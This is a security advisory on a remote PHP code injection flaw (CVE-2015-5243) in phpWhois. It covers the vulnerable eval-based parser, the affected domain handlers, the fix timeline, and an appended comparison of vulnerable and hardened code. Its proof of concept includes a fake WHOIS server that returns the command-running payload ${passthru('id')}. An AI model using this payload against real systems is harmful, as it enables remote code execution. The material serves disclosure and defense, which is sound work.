PHP Code Injection
Source: github.com, listed under OpenJS Foundation (advisory ID FRIENDSOFPHP:JSMITTY12)
Published: 2018-05-29 18:12:55
EPSS: 0.051 (percentile 93.0%)
phpWhois PHP Code Injection

Vulnerability Overview

phpWhois and some of its forks in versions before 5.1.0 are prone to a
code injection vulnerability due to insufficient sanitization of returned
WHOIS data. This allows attackers controlling the WHOIS information of a
requested domain to execute arbitrary PHP code in the context of the
application.

Identifier            : SBA-ADV-20180425-01
Type of Vulnerability : Code Injection
Software/Product Name : phpWhois
Vendor                : phpwhois.org, abcdmitry, jsmitty12, webalternative and others
Affected Versions     : phpwhois.org: 4.2.2 and probably prior, as well as the following forks:
                        abcdmitry: 4.2.5 and probably prior,
                        jsmitty12: 5.0.2 and probably prior
Fixed in Version      : jsmitty12: 5.1.0
CVE ID                : CVE-2015-5243
CVSSv3 Vector         : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Base Score     : 9.8 (Critical)

Vendor Description

This package contains a Whois (RFC954) library for PHP. It allows a
PHP program to create a Whois object, and obtain the output of a
whois query with the lookup function.

Source: https://github.com/phpWhois/phpWhois

Impact

By exploiting the vulnerability documented in this advisory, an
attacker controlling the WHOIS information of a domain retrieved via
phpWhois can execute arbitrary PHP code in the context of the
application. The set of domains enabling this attack vector is limited
to certain top-level domains. Sensitive data accessible by the
application might get exposed through this attack.

The vulnerability is fixed in version 5.1.0 or newer of jsmitty12's fork.
We recommend upgrading to this version.

Vulnerability Description

phpWhois implements multiple generic parsers for WHOIS data in
whois.parser.php. The parser implemented in the function
generic_parser_b is vulnerable to injection of PHP code.

The function generic_parser_b builds a PHP statement from WHOIS data
values by concatenating strings without proper sanitization. It then
passes the statement to the eval function:

function generic_parser_b($rawdata, $items = array(), $dateformat = 'mdy', $hasreg = true, $scanall = false) {
[…]
    foreach ($rawdata as $val) {
        if (trim($val) != '') {
            if (($val[0] == '%' || $val[0] == '#') && $disok) {
                $r['disclaimer'][] = trim(substr($val, 1));
                $disok = true;
                continue;
            }
            $disok = false;
            reset($items);
            foreach ($items as $match => $field) {
                $pos = strpos($val, $match);
                if ($pos !== false) {
                    if ($field != '') {
                        $var = '$r' . getvarname($field);
                        $itm = trim(substr($val, $pos + strlen($match)));
                        if ($itm != '')
                            eval($var . '="' . str_replace('"', '\\"', $itm) . '";');
                    }
                    if (!$scanall)
                        break;
                }
            }
        }
    }
[…]
}

At least the following 33 top-level domain handlers make use of the
vulnerable parser:

ae, aero, ag, asia, au, bh, biz, cat, cn, co, co.za, fi, hu, in, info, jp,
lu, me, mobi, museum, name, nz, org, pro, ru, sc, se, su, tel, travel, us,
ws, xxx

Proof-of-Concept

An attacker can exploit this vulnerability by setting malicious WHOIS
information such as Registrant Name: ${passthru('id')} for an arbitrary
.org domain.

Instead of a real name, we specify ${passthru('id')}, which PHP will
interpret as a variable expansion inside a double-quoted string literal.

We simulate this situation via a simple WHOIS server implementation
(Python 2):

import SocketServer

DATA = "Registrant Name: ${passthru('id')}\n"

class WhoisHandler(SocketServer.BaseRequestHandler):
    def handle(self):
        self.request.recv(1024)
        print('Request received')
        self.request.sendall(DATA)
        print('Payload sent')

if __name__ == '__main__':
    SocketServer.ThreadingTCPServer.allow_reuse_address = True
    server = SocketServer.ThreadingTCPServer(('127.0.0.1', 9999), WhoisHandler)
    server.serve_forever()

The following example sets up phpWhois to use the simulated WHOIS
server and requests information for example.org:

<?php
$whois = new Whois();   // object construction reconstructed; the original lines were truncated here
$whois->useServer('org', '127.0.0.1:9999');
echo $whois->lookup('example.org');

As a result, the vulnerable phpWhois version executes the injected PHP
statement passthru('id'), which runs the Unix id command on the
server and returns its output.

Timeline

2018-04-25: identification of vulnerability
2018-04-26: initial contact of several phpWhois and fork maintainers
2018-04-26: disclosed vulnerability to phpwhois.org project maintainer
2018-04-27: disclosed vulnerability to jsmitty12
2018-04-30: phpwhois.org project maintainer stated that it is a
            known issue (CVE-2015-5243) with a fix committed at
            https://github.com/sparc/phpWhois.org
2018-04-30: fix is not released yet and MITRE lists CVE-2015-5243
            as assigned but private
2018-05-29: jsmitty12 released fixed version 5.1.0
2018-08-01: public disclosure

References

Original advisory: https://blog.nettitude.com/uk/cve-2015-5243-phpwhois-remote-code-execution

Fixes:
https://github.com/sparc/phpWhois.org/commit/5cc572490c9053d46598ec9348a11e36a5a33a46#diff-f150ae17da7341bf6c2eff928684b3a3
https://github.com/Gemorroj/phpwhois/commit/91c937e03c876ba1290b6de2a3ad953d2105fdd0
https://github.com/jsmitty12/phpWhois/commit/863ccf62824f9998099ed20c2952ec8953ce3d06

Credits

Original advisory by Iain Wallace (Nettitude)
Rediscovered by David Gnedt (SBA Research)
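As an added illustration (not phpWhois code and not part of the advisory), the following PHP contrasts the eval-based assignment of generic_parser_b with the plain array assignment the fixes amount to; getvarname() is replaced by a direct array key, and the WHOIS value is a constructed, harmless one whose ${...} expression merely resolves to a local variable so the two code paths can be told apart:

```php
<?php
// Added example, not phpWhois code. Contrasts the eval()-based assignment
// used by generic_parser_b with a plain array assignment. getvarname() is
// replaced by a direct array key for brevity (an assumption of this example).

// Vulnerable pattern: the WHOIS value is spliced into a double-quoted PHP
// string literal and eval()ed. Escaping the quote character does not stop
// PHP from interpolating "$var" and "${expr}" sequences inside the literal.
function vulnerable_assign(array &$r, string $field, string $itm): void
{
    $marker = 'INTERPOLATED';   // any local variable is reachable from eval()
    $var = '$r["' . $field . '"]';
    eval($var . '="' . str_replace('"', '\\"', $itm) . '";');
}

// Hardened pattern (what the referenced fixes amount to): store the value
// as data with an ordinary assignment; no PHP statement is ever built.
function safe_assign(array &$r, string $field, string $itm): void
{
    $r[$field] = $itm;
}

// Detection aid for operators: WHOIS values containing PHP interpolation
// sigils ($, {, \) are worth logging while an unpatched parser is deployed.
function has_interpolation_sigils(string $itm): bool
{
    return preg_match('/[\$\{\\\\]/', $itm) === 1;
}

// Constructed WHOIS line (harmless): strrev('rekram') evaluates to "marker",
// so the vulnerable path resolves ${...} to the value of $marker, proving
// that the expression inside the value was executed rather than stored.
$line  = 'Registrant Name: ${strrev(\'rekram\')}';
$match = 'Registrant Name:';
$itm   = trim(substr($line, strpos($line, $match) + strlen($match)));

$vuln = [];
vulnerable_assign($vuln, 'owner.name', $itm);   // PHP 8.2+ additionally emits a ${} deprecation notice
$safe = [];
safe_assign($safe, 'owner.name', $itm);

printf("vulnerable path stored: %s\n", var_export($vuln['owner.name'], true));
printf("hardened path stored:   %s\n", var_export($safe['owner.name'], true));
printf("sigils detected:        %s\n", has_interpolation_sigils($itm) ? 'yes' : 'no');
```

The vulnerable path stores the marker text instead of the registrant string, while the hardened path stores the registrant string verbatim.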
